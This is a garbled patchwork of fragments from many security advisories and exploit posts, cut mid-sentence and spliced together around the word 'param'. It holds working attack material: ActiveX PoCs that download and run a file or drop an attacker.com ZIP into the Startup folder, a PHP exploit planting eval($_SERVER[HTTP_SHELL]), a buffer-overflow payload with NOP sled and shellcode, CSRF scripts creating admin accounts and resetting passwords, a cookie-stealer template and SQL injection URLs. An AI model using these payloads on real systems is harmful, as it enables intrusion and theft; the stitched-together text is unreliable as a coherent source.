something like the following code:
<html><body>
<object id="dm" classid="CLSID:4871A87A-BFDD-4106-8153-FFDE2BAC2967"
codebase="http://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.4.8.cab#Version=2,2,4,8" width="1" height="1">
<PARAM name="URL"
value="http://www.akitasecurity.nl/advisory/RunCalc.exe"/>
</object>
<a href="javascript:dm.StartDownload();">start download</a>
</body></html>
print of a host resident print job, archived print job or a report
stream through a server-side script request.
Anzio Web Print Object is vulnerable to a buffer overflow attack, which
can be exploited by remote attackers to execute arbitrary code, by
providing a malicious web page with a long "mainurl" parameter for the
WePO ActiveX component.
*Vulnerable Packages*
print "Email account's email\n";
print "File PHP script upload and execute\n";
print "Id account'id\n\n";
exit();
}
function getparam($param,$opt='')
{
global $argv;
foreach($argv as $value => $key)
{
if($key == '-'.$param) return $argv[$value+1];
<OBJECT ID="DownloaderActiveX1"
WIDTH="0"
HEIGHT="0"
CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61"
CODEBASE="DownloaderActiveX.cab#Version=1,0,0,1">
<PARAM NAME="propProgressBackground" VALUE="#bccee8">
<PARAM NAME="propTextBackground" VALUE="#f7f8fc">
<PARAM NAME="propBarColor" VALUE="#df0203">
<PARAM NAME="propTextColor" VALUE="#000000">
<PARAM NAME="propWidth" VALUE="0">
<PARAM NAME="propHeight" VALUE="0">
> 325 applyDbAudit($action);
> 326 &delline($linenum,2);
> 327 cleanSiteFingerPrints($deletesitename);
> 328
> 329 &deleteSiteConf($deletesitename);
> 330 $site_params="$CTMP_DIR/".$deletesitename."_params";
> 331 system("rm -f $site_params");
>
>
> And applicure-lib2.pl:
>
325 applyDbAudit($action);
326 &delline($linenum,2);
327 cleanSiteFingerPrints($deletesitename);
328
329 &deleteSiteConf($deletesitename);
330 $site_params="$CTMP_DIR/".$deletesitename."_params";
331 system("rm -f $site_params");
And applicure-lib2.pl:
log/sysbacktrace.81:30
4. Here is a grep that shows where the password is actually being recorded; it includes the system IP, the domain, the username and the password. (Username, domain, and password have been masked with ###.)
root@ultidesk:~/logs# grep -R rpcclient2 * | more
..
log/sysbacktrace.84:0 500 9429 9428 18 0 9244 1328 - S ? 0:00 rpcclient2 //10.20.36.233/ -W #### -U #######%############# --param 10.20.36.233 system 1 1 0 RPC-EVENTLOG
log/sysbacktrace.84:0 500 9432 9431 19 0 9116 1328 - S ? 0:00 rpcclient2 //10.4.90.12/ -W #### -U #######%############# --param 10.4.90.12 security 1 1 0 RPC-EVENTLOG
log/sysbacktrace.84:0 500 9423 9422 18 0 8896 1328 - S ? 0:00 rpcclient2 //10.8.32.40/ -W #### -U #######%############# --param 10.8.32.40 system 1 1 0 RPC-EVENTLOG
log/sysbacktrace.84:0 500 7714 7713 18 0 8776 1328 - S ? 0:00 rpcclient2 //10.20.1.93/ -W #### -U #######%############# --param 10.20.1.93 security 1 1 0 RPC-EVENTLOG
log/sysbacktrace.84:0 500 9813 9812 15 0 8672 1848 - S ? 0:00 rpcclient2 //10.16.34.21/ -W #### -U #######%############# --param 10.16.34.21 security 1 1 0 RPC-EVENTLOG
log/sysbacktrace.84:0 500 9303 9302 19 0 8448 1328 - S ? 0:00 rpcclient2 //10.30.25.130/ -W #### -U #######%############# --param 10.30.25.130 system 1 1 0 RPC-EVENTLOG
DSSIGNIN=url_default; DSOSMLOGIN=x; DSIVS=; DSCheckBrowser=x;
DSID=5beee6a236f28b2c3ccf14d56b34feba; DSLaunchURL=x;
DSBrowserProxy=127.0.0.1%3A8080;
RESULTS (PART OF)
<PARAM NAME="AutoStart" VALUE="false"><param name="locale" value="en">
<param name="upgradeMode" value="">
<param name="Parameter0"
value="cert_md5=8ae8f59ab11a2e6f43b383876d270799;dns-suffix=procheckup.com;switch-dns-search-order=disabled;internal-proxy-config=no;ncp_read_timeout=90;enable_logging=0;enable_logupload=0;win_start_script=;win_end_script=;win_skip_start_script=0;linux_start_script=;linux_end_script=;mac_start_script=;mac_end_script=;signin_url=/e6cf2"><script>alert(1)</script>81d17f3a375;fips_mode=0">
<param name="Parameter1" value="split-tunneling-routes=">
<param name="Parameter2" value="split-tunneling-mode=1">
from the CHM file's Table of Contents file, and links can be directly accessed
regardless of the help file's locked state.
Consider this example which references a local html file, and will not render:
<param name="Name" value="I will not work">
<param name="Local" value="pleasegivemeashell.htm">
And this example which will render, and spawn a shell through javascript/vbscript + activex:
<param name="Name" value="shell">
method of the control.
PoC:
<OBJECT ID="DVR" classid="clsid:66F7F252-3FE1-4650-B1E5-94B2A38271C5" STYLE="width: 0px;">
<PARAM NAME="_Version" VALUE="65536">
<PARAM NAME="_ExtentX" VALUE="18203">
<PARAM NAME="_ExtentY" VALUE="13705">
<PARAM NAME="_StockProps" VALUE="0">
<PARAM NAME="Split" VALUE="4">
</OBJECT>
>from the CHM file's Table of Contents file, and links can be directly accessed
>regardless of the help file's locked state.
>
>Consider this example which references a local html file, and will not render:
>
><param name="Name" value="I will not work"> <param name="Local"
>value="pleasegivemeashell.htm">
>
>And this example which will render, and spawn a shell through
>javascript/vbscript + activex:
>
# Version: <= 5.9.14.1246
# Tested on: xpsp3 ie6
# Greeting to Xunlei Security Center guys: your guys still have not released a patch or new version to fix the vuln, which can also attack Xunlei KanKan Player (http://dl.xunlei.com/xmp.html). I exposed this vuln two weeks ago; are you really responsible for the security of millions of users?
# POC Code :
<object id=ooxooxx classid="CLSID:{F3E70CEA-956E-49CC-B444-73AFE593AD7F}">
<PARAM NAME="_cx" VALUE="0xFFFFFFFF">
<PARAM NAME="_cy" VALUE="0xFFFFFFFF">
<PARAM NAME="UiMode" VALUE="-1">
<PARAM NAME="InnerPlayerType" VALUE="-1">
</object>
<object id="GetActiveX"
classid="clsid:CF40ACC5-E1BB-4aff-AC72-04C2F616BCA7"
codebase="http://wwwimages.adobe.com/www.adobe.com/products/acrobat/nos/gp.cab#Version=1,5,2,35"
type="application/x-oleobject" width="1" height="1">
<param name="Service-URL"
value="http://get.adobe.com/reader/webservices/dlm/" />
<param name="itemid" value="860;941" />
<param name="language" value="" />
<param name="os" value="" />
</object>
var url = 'http://localhost/MamboV4.6.2/administrator/index2.php';
var gid = 25;
var user = 'amnpardaz';
var pass = 'amnpardaz';
var email = 'amnpardaz@none.com';
var param = {
name: user,
username: user,
email: email,
password: pass,
window.onload = function() {
var url = "http://127.0.0.1:8000/admin/auth/user/1/password/";
var pass = "funky";
var param = {
password1: pass,
password2: pass
};
var form = document.createElement('form');
An authenticated remote attacker could exploit this to generate XSS from
which they could modify or steal confidential data of other users within
the same web domain. (MSA-08-0021)
It was discovered that Moodle did not correctly filter inputs for group
creation, mnet, essay question, HOST param, wiki param, and others.
An authenticated remote attacker could exploit this to generate XSS
from which they could modify or steal confidential data of other users
within the same web domain. (MDL-9288, MDL-11759, MDL-12079, MDL-12793,
MDL-14806)
...
27 function getUserSetting(){
28 $exp = time() + 60*60*24*355;
29 if (isset($_COOKIE[$this->template.'_tpl']) &&
$_COOKIE[$this->template.'_tpl'] == $this->template){
30 foreach($this->_params_cookie as $k=>$v) {
31 $kc = $this->template."_".$k;
32 if (isset($_GET[$k])){
33 $v = $_GET[$k];
34 setcookie ($kc, $v, $exp, '/');
35 }else{
.text:6DAA3EF6 mov [ebp+StartupInfo.cb], 44h
.text:6DAA3EFD call ds:CreateProcessA
So basically the Java-Plugin Browser is running "javaws.exe" without
validating command-line parameters. These parameters can be controlled
by attackers via specially crafted embed html tags within a webpage.
Let's see JavaDeploy.txt:
if (browser == 'MSIE') {
var bid = [block id];
var topic = [name block];
var content = [cookie stealer];
var param = {
id: bid,
block_topic: topic,
block_content: content,
block_vis: 1,
block_style: 1,
1312 |
1313 | if( substr_count( $_toTest, '?' ) > 1 )
1314 | {
1315 | $_secondQueryString = substr( $_toTest,
strrpos( $_toTest, '?' ) + 1 );
1316 | $_secondParams = explode( '&',
$_secondQueryString );
1317 |
1318 | if( count($_secondParams) )
1319 | {
1320 | foreach( $_secondParams as $_param )
http://ruder.cdut.net
Summary:
A parameter injection vulnerability exists in Akamai Download
Manager. By exploiting this vulnerability, a remote attacker can
make users download an arbitrary file and save it to an arbitrary
location while they are visiting a malicious web page. This means an
attacker who successfully exploits this vulnerability can run
arbitrary code on the affected system.
var pass = 'custom_password';
var email = 'joe_cool@example.com';
var param = {
name: user,
username: user,
HttpSkin,
SkinPath's values. Malicious files hosted on the attacker's site must
be compressed as a ZIP file.
For instance, the modification below copies abnormal files to the Windows
root directory.
<PARAM NAME="HttpSkin" VALUE="http://www.attacker.com/maliciousFiles.zip">
<PARAM NAME="SkinPath" VALUE="../../../../">
In this way an attacker can point SkinPath's value at the All Users' Start
Program folder. His malicious program is then executed when the user
restarts the computer.
===================================================================
--- lib/webrick/accesslog.rb (revision 26065)
+++ lib/webrick/accesslog.rb (working copy)
@@ -54,5 +54,5 @@ module WEBrick
raise AccessLogError,
"parameter is required for \"#{spec}\"" unless param
- params[spec][param] || "-"
+ param = params[spec][param] ? escape(param) : "-"
when ?t
params[spec].strftime(param || CLF_TIME_FORMAT)
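Review bot: the added line `param = params[spec][param] ? escape(param) : "-"` has an operator-precedence problem. In Ruby, assignment binds more loosely than the ternary, so this parses as `param = (params[spec][param] ? escape(param) : "-")`: the condition reads the looked-up value, but the true branch calls `escape` on the original `param` (the format parameter name) and the looked-up value itself is discarded. The removed line `params[spec][param] || "-"` returned the value, so the new line changes what gets logged. The intended form is `(param = params[spec][param]) ? escape(param) : "-"`, which assigns the value first and then escapes it.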
@@ -60,8 +60,16 @@ module WEBrick
require('phpsploitclass.php');
head();
if($argc < 3) usage();
$url = getparam('url', true);
$prx = getparam('proxy', false);
$pra = getparam('proxyauth', false);
$cod = 'eval($_SERVER[HTTP_SHELL]);';
$xpl = new phpsploit();
$this->agent('Mozilla Firefox');
$this->cookiejar(1);
$this->mhead();
$this->uri = $this->getparam('url', TRUE);
$this->url_arr = parse_url($this->uri);
$this->patch = $this->getparam('patch');
$this->proxh = $this->getparam('proxhost');
$this->proxa = $this->getparam('proxauth');
[ DESCRIPTION ]
S21sec has discovered a vulnerability in Cezanne 7 that allows injecting
SQL code in text variables.
This issue allows SQL code execution in the application server.
The vulnerable param is "FUNID".
Some examples of the exploitation:
URL[ NEEDS LOGIN ]:
https://www.somesite.es/cezanneweb/CFLookup.asp?FUNID=7302015;waitfor%20delay%20'0:0:20';--&InIFrame=1
STRING:;waitfor%20delay%20'0:0:20';--
directly via URLs by installing a protocol handler for the scheme "hcp",
a typical example is provided in the Windows XP Command Line Reference,
available at http://technet.microsoft.com/en-us/library/bb490918.aspx.
Using hcp:// URLs is intended to be safe, as when invoked via the registered
protocol handler the command line parameter /fromhcp is passed to the help
centre application. This flag switches the help centre into a restricted mode,
which will only permit a whitelisted set of help documents and parameters.
This design, introduced in SP2, is reasonably sound. A whitelist of trusted
documents is a safe way of allowing interaction with the documentation from
> $junk = "\x45\x45\x45\x59";
> $eip = "\x2d\xd1\xe0\x77"; // call eax user32.dll
> $exploit=
>
str_repeat("\x90",268).$eip.$junk."\x90\x90\x90\x0d\x01".str_repeat("\x90",16).$shellcode.str_repeat("\x90",9999);
> echo "<param name=\"RejectedRecordsFile\"
> value=\"$exploit\"/>";
> ?>
> </object>
> </html>
> > user's computer display, as it is shown in the
> > address box of the browser. These days, with a
> > camera phone, the attacker does not have to be
> > James Bond to pull that off.
>
> You could insert as the first param random junk
> that's 100 characters long that will "push" the
> real token off-screen.
Yes.